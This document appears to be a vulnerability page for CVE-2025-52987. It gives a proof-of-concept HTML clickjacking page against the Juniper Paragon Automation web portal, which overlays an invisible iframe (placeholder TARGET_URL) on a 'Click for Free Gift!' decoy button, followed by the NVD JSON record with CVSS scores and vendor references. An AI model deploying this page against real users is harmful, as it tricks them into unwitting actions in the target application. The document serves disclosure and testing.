CVE-2025-52987

<!-- CVE-2025-52987 PoC - Clickjacking Attack --> <!DOCTYPE html> <html> <head> <title>Clickjacking PoC - CVE-2025-52987</title> <style> body { margin: 0; padding: 0; background: #f0f0f0; font-family: Arial, sans-serif; } .decoy-button { position: absolute; top: 200px; left: 100px; width: 200px; height: 50px; background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); color: white; border: none; border-radius: 25px; font-size: 18px; cursor: pointer; z-index: 1; } .iframe-container { position: absolute; top: 190px; left: 90px; width: 220px; height: 70px; opacity: 0; z-index: 2; } iframe { width: 100%; height: 100%; border: none; } .description { position: absolute; top: 50px; left: 50px; max-width: 600px; padding: 20px; background: white; border-radius: 10px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); } </style> </head> <body> <div class="description"> <h2>CVE-2025-52987 PoC</h2> <p><strong>Target:</strong> Juniper Paragon Automation Web Portal</p> <p><strong>Vulnerability:</strong> Missing X-Frame-Options header</p> <p><strong>Attack:</strong> Click the button below - it will hijack your click to the target application</p> </div> <button class="decoy-button">Click for Free Gift!</button> <div class="iframe-container"> <!-- Replace TARGET_URL with actual Paragon Automation endpoint --> <iframe src="TARGET_URL" sandbox="allow-same-origin allow-scripts allow-forms"></iframe> </div> <script> console.log('PoC for CVE-2025-52987: Clickjacking in Juniper Paragon Automation'); console.log('This demonstrates how an attacker can trick users into clicking hidden elements.'); </script> </body> </html>

{"cve": {"id": "CVE-2025-52987", "sourceIdentifier": "[email protected]", "published": "2026-01-15T21:16:02.653", "lastModified": "2026-01-26T18:01:01.997", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A clickjacking vulnerability exists in the web portal of Juniper Networks Paragon Automation (Pathfinder, Planner, Insights) due to the application's failure to set appropriate X-Frame-Options and X-Content-Type HTTP headers. This vulnerability allows an attacker to trick users into interacting with the interface under the attacker's control. \n\nThis issue affects all versions of Paragon Automation (Pathfinder, Planner, Insights) before 24.1.1."}, {"lang": "es", "value": "Una vulnerabilidad de clickjacking existe en el portal web de Juniper Networks Paragon Automation (Pathfinder, Planner, Insights) debido a que la aplicación no establece los encabezados HTTP X-Frame-Options y X-Content-Type adecuados. Esta vulnerabilidad permite a un atacante engañar a los usuarios para que interactúen con la interfaz bajo el control del atacante.\n\nEste problema afecta a todas las versiones de Paragon Automation (Pathfinder, Planner, Insights) anteriores a la 24.1.1."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:M/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1021"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:juniper:paragon_automation:*:*:*:*:*:*:*:*", "versionEndExcluding": "24.1.1", "matchCriteriaId": "6E0B7E88-1016-4ED6-86C3-B60B6D8CE501"}]}]}], "references": [{"url": "https://kb.juniper.net/JSA103145", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://supportportal.juniper.net/", "source": "[email protected]", "tags": ["Permissions Required"]}]}}